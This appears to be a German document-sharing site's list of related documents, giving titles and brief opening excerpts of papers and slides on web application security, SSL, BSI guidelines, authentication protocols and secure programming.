SIWECOS KMU Webseiten-Check 2018 Für den SIWECOS KMU Webseiten-Check wurden 1.142 Webseiten kleiner und mittelständischer Unternehmen aus Deutschland mit den Scannern des SIWECOS Projekts auf mögliche
MehrSicherheit von Webapplikationen Sichere Web-Anwendungen
Sicherheit von Webapplikationen Sichere Web-Anwendungen Daniel Szameitat Agenda 2 Web Technologien l HTTP(Hypertext Transfer Protocol): zustandsloses Protokoll über TCP auf Port 80 HTTPS Verschlüsselt
Mehr[14-04] Huseby, Sverry: Sicherheitsrisiko Web-Anwendung. dpunkt, 2004
Literatur I [14-01] Power, Richard: Attacken im Web. Markt+Technik, 2001 [14-02] Kunz, Christopher; Esser, Stefan: PHP-Sicherheit. dpunkt, 3. Auflage, 2008 [14-03] Ziegler, Paul Sebastian: Cross-Site Scripting.
MehrSicherheit im Internet - Datenschutz als Standortvorteil im E-Business -
Sicherheit im Internet - Datenschutz als Standortvorteil im E-Business - Dipl.-Inform. Marit Köhntopp Unabhängiges Landeszentrum für Datenschutz Schleswig-Holstein Düsternbrooker Weg 82, 24105 Kiel Tel.:
MehrBesser geht immer. - SSL Verschlüsselung - Notwendigkeiten, Hintergründe, Vorteile, Kosten. Sicherheit zum Festpreis.
Besser geht immer. - SSL Verschlüsselung - Notwendigkeiten, Hintergründe, Vorteile, Kosten Sicherheit zum Festpreis. Eine SSL Verschlüsselung bringt klare Vorteile Sicherheit zuerst Durch SSL verschlüsseln
MehrIntegration von UIS-Webdiensten
Integration von UIS-Webdiensten neue Möglichkeiten durch Web 2.0 basierte Technologien Clemens Düpmeier, Werner Geiger, Claudia Greceanu (duepmeier, geiger, greceanu@iai.fzk.de) Institut für Angewandte
MehrSichere Nutzung von Web-Angeboten (ISi-Web-Client)
Sichere Nutzung von Web-Angeboten (ISi-Web-Client) BSI-Leitlinie zur Internet-Sicherheit (ISi-L) Version 1.2 vom 7. Oktober 2015 ISi-Reihe ISi-L Sichere Nutzung von Web-Angeboten Vervielfältigung und Verbreitung
MehrShibboleth und Kerberos in gemischten Umgebungen Erfahrungen und Grenzen
Shibboleth und Kerberos in gemischten Umgebungen Erfahrungen und Grenzen 66. DFN-Betriebstagung, AAI-Forum, 21.03.2017 Frank Schreiterer Universität Bamberg S. 1 Agenda 1. Ausgangssituation 2. Anpassungen
MehrFunktionen nur wenn dann
Funktionen nur wenn dann Funktionen können auch nur in bestimmten Fällen angewendet werden. Code wird nur in einem bestimmten Fall ausgeführt Code Ja Code Block wahr if wahr? Nein else Code Block Alternative
MehrEine Untersuchung der Funktionen des Apache Wicket Webframeworks
Eine Untersuchung der Funktionen des Apache Wicket Webframeworks Seminararbeit von Olaf Matticzk 1 15.01.2016 (c) by synaix 2016 synaix...your business as a service. Agenda 1. Einleitung 2. Webanwendungen
MehrWhen your browser turns against you Stealing local files
Information Security When your browser turns against you Stealing local files Eine Präsentation von Alexander Inführ whoami Alexander Inführ Information Security FH. St Pölten Internet Explorer Tester
MehrSicherheitsanalyse der Private Cloud Interfaces von
Sicherheitsanalyse der Private Cloud Interfaces von Emanuel Durmaz Ruhr-Universität Bochum 1 Emanuel Durmaz 10/16: Bachelor of Science IT-Sicherheit, Ruhr-Universität Bochum Thesis: Sicherheitsanalyse
MehrInstallations- und Update-Anleitung für TransportControl v2.8
Installations- und Update-Anleitung für TransportControl v2.8 Stand: 08.04.2019 Autor: S. Karwehl Inhaltsverzeichnis 1. Systemanforderungen 1 1.1. TransportControl Server 1 1.2. TransportControl Browser
MehrSchönes neues Internet
Schönes neues Internet Markus de Brün Bundesamt für Sicherheit in der Informationstechnik AK Sicherheit, 7. Oktober 2009 Markus de Brün 7. Oktober 2009 Folie 1 Agenda Gefahr aus dem Web aktuelle Lage &
MehrIhre Datenschutzerklärung. Datenschutzerklärung. Datenschutz. Cookies
Ihre Datenschutzerklärung Im Folgenden finden Sie die Textdaten für Ihre persönliche Datenschutzerklärung für Ihre Website gemäß der von Ihnen getätigten Angaben. Sofern Sie die Inhalte gleich in HTML-Form
MehrCASE STUDY SICHERES ONLINEBANKING
CASE STUDY SICHERES ONLINEBANKING Spätestens seit den Enthüllungen von Edward Snowden ist IT-Sicherheit ein nicht nur in den Medien intensiv diskutiertes Thema. Auch die Bundesregierung will mit dem in
MehrSichere Programmierung. Klaus Kusche
Sichere Programmierung Klaus Kusche Typische Ursachen für Lücken Große Mehrheit aller Lücken: Speicherüberschreiber Fehlende Input-Filterung ==> Jeweils eigener Foliensatz Restliche Lücken: Mehrere verschiedene
Mehr1)Login Funktion ohne Datenbank
1)Login Funktion ohne Datenbank Die Seite privat.php soll erst aufrufbar sein, wenn der Login, mit der Datei login.html erfolgreich war. Die ist verknüpft mit der login.php. Die logout.php dient zur ordentlichen
MehrDIAMETER Base Protocol (RFC3588)
Base Protocol (RFC3588) ist eine (nicht rückwärtskompatible) Fortentwicklung des RADIUS Protokolls (Remote Authentication Dial In User Service, RFC2865). Die wichtigsten Unterschiede sind: Es benutzt einen
Mehr